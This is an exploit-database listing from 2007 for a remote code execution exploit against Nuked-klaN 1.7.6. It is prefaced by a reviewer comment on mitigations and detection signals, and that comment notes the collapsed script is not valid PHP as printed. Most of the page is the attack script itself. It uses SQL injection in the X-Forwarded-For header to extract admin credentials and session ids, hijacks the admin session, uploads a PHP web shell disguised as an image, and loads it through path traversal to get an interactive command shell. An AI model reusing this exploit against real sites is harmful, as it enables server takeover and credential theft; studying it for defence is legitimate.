Nuked-klaN 1.7.6 Remote Code Execution Exploit

2007.05.12
Credit: DarkFig
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php
/*
 * Proof-of-concept advisory script for Nuked-klaN 1.7.6 (2007), reproduced
 * here as published. Reviewer notes, from the listing itself:
 *
 * - As printed on this page the script has been collapsed onto two lines,
 *   so the `#` line comments swallow the statements that followed them and
 *   the text is not valid PHP as shown; it also depends on an external
 *   `phpsploitclass.php` that is not part of this page.
 *
 * - Injection point: the SQL fragments in $request/$sql are sent in the
 *   X-Forwarded-For request header. That only works if the application
 *   writes that header into a query without parameterisation (the
 *   vulnerable application code is not on this page). Proxy headers such
 *   as X-Forwarded-For are client-controlled and must be treated as
 *   untrusted input; always use prepared statements.
 *
 * - The query results are read back out of the response body between the
 *   $config[3] marker strings, and the recovered user id / session id are
 *   then replayed as `admin_session`, `user_id` and `sess_id` cookies.
 *   Session identifiers stored in a table reachable by injection mean any
 *   SQL injection is also a session-takeover primitive.
 *
 * - The avatar upload (`op=update_pref`, field `fichiernom`) accepts a
 *   file named 1.jpg whose content is PHP; the admin SQL runner
 *   (`page=mysql&op=upgrade_db`) is then used to point a block `type` at
 *   that file with `../` traversal and a trailing NUL byte. Uploads should
 *   be validated on content, stored outside the web root and never used
 *   to build include paths; PHP itself rejects NUL bytes in include paths
 *   since 5.3.4, and admin SQL consoles should not exist in production.
 *
 * - Detection signals visible from this listing: SQL syntax inside the
 *   X-Forwarded-For header, requests carrying a non-standard `Shell`
 *   header, image uploads whose bytes begin with `<?php`, and POSTs to
 *   `op=upgrade_db`.
 */
# # Nuked-klaN 1.7.6 Remote Code Execution Exploit # ------------------------------------------------ # Author: DarkFig <gmdarkfig (at) gmail (dot) com [email concealed]> # Website: http://www.acid-root.new.fr/ # PHP conditions: None =] # Private since 2 months. # error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class. require("phpsploitclass.php"); # If you want to use this class, the latest # version can be downloaded from acid-root.new.fr. $xpl = new phpsploit(); $url = 'http://localhost/nk/'; # url $prx = ''; # proxy <proxyip>:<proxyport> $pra = ''; # basic authentification <proxyuser:proxypwd> $xpl->agent("Firefox"); $xpl->allowredirection(0); $xpl->cookiejar(0); if($prx) $xpl->proxy($prx); if($pra) $xpl->proxyauth($pra); $config = array(); $config[] = 'nuked'; # table prefix $config[] = 'nuked'; # cookie prefix $config[] = 'ORDER by date LIMIT 1'; # sql conditions $config[] = 'HAK'; # match, length <= 3 $config[] = '<?php'."\n" # php code .'error_reporting(0);' .'if(isset($_SERVER[HTTP_SHELL]))' .'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' .'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'; $request = array(); $request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'"; $request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'"; $request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'"; $request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'"; for($i=0;$i<count($request);$i++) { $deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT("; $sql = $deb.$request[$i]."))) #"; $xpl->addheader("X-Forwarded-For",$sql); $xpl->get($url); $xpl->reset('header'); } if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$ xpl->getcontent(),$matches)) die("Exploit Failed"); $what = 
array("login","passwd","user_id","session"); for($i=0;$i<count($what);$i++) print "\n".$what[$i]." -> ".$matches[2][$i]; if(empty($matches[2][3])) exit("\nNo session found"); # Logged in as admin $name = array("admin_session","user_id","sess_id"); $xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]); $xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]); $phpc = array( frmdt_url => $url.'?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4])); $xpl->addheader('Referer',$url); $xpl->formdata($phpc); $xpl->get($url.'?file=User&op=edit_pref'); if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found"); else print "\n\$shell> "; $sql = array(); $sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/ $sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;"; $sql[] = "DELETE FROM $config[0]_nbconnecte;"; for($i=0;$i<count($sql);$i++) $xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$ i]); while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # 0'); include('./conf.inc.php'); print $global['db_pass']; // $xpl->reset('header'); $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url); $data = explode('123456789',$xpl->getcontent()); print $data[1]."\n\$shell> "; } function char($data) { $char='CHAR('; for($i=0;$i<strlen($data);$i++) { $char .= ord($data[$i]); if($i != (strlen($data)-1)) $char .= ','; } return $char.')'; } ?>

